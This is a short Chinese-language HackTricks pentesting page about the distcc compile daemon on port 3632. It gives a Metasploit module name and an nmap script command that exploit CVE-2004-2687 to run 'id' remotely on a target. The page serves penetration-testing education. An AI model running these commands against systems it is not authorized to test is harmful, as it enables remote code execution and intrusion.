hacktricks/network-services-pentesting/3632-pentesting-distcc.md

2.1 KiB
Raw Blame History

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

其他支持HackTricks的方式

基本信息

Distcc是一种工具,通过利用网络中其他计算机的空闲处理能力来增强编译过程。当在一台机器上设置distcc时,该机器能够将其编译任务分发给另一台系统。接收系统必须运行distccd守护程序,并且必须安装有兼容的编译器以处理发送的代码。

默认端口: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

漏洞利用

检查是否容易受到 CVE-2004-2687 漏洞的影响,以执行任意代码:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

我认为shodan没有检测到这项服务。

资源

Álex B (@r1p) 创建的帖子